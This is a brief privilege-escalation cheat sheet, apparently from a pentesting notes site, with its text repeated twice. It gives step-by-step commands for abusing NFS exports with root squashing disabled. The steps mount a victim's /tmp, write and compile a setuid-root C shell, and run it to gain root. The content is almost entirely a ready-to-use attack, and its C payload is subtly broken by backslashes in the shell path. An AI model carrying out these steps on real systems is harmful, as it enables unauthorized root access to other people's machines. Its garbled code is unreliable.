NFS Root Squashing

Check if you can mount any directory. For this, check if root squashing is disabled on any directory with the command: cat /etc/exports

You can also check using: showmount -e IP (Attacking machine)

#Make a mount directory in Kali machine
mkdir /tmp/mnt
#Mount the "tmp" directory of victim machine (Assuming tmp is mountable)
mount -o rw,vers=2 IP:/tmp /tmp/mnt
#Create a malicious C file
echo 'int main() { setgid(0); setuid(0); system("\bin\bash"); return 0; }' > /tmp/mnt/shell.c
#Check if the file has been created then compile it
gcc /tmp/mnt/shell.c -o /tmp/mnt/shell
#Ignore the warnings
chmod +s /tmp/mnt/shell
#Go to victim machine and execute the file
cd /tmp
./shell

#Mount Alternative Command:
mount -t nfs IP:/ your_folder/ -no lock

PreviousScheduled Tasks NextDocker

Last updated 3 years ago

Was this helpful?

NFS Root Squashing

Check if you can mount any directory. For this, check if root squashing is disabled on any directory with the command: cat /etc/exports

You can also check using: showmount -e IP (Attacking machine)

#Make a mount directory in Kali machine
mkdir /tmp/mnt
#Mount the "tmp" directory of victim machine (Assuming tmp is mountable)
mount -o rw,vers=2 IP:/tmp /tmp/mnt
#Create a malicious C file
echo 'int main() { setgid(0); setuid(0); system("\bin\bash"); return 0; }' > /tmp/mnt/shell.c
#Check if the file has been created then compile it
gcc /tmp/mnt/shell.c -o /tmp/mnt/shell
#Ignore the warnings
chmod +s /tmp/mnt/shell
#Go to victim machine and execute the file
cd /tmp
./shell

#Mount Alternative Command:
mount -t nfs IP:/ your_folder/ -no lock

PreviousScheduled Tasks NextDocker

Last updated 3 years ago

Was this helpful?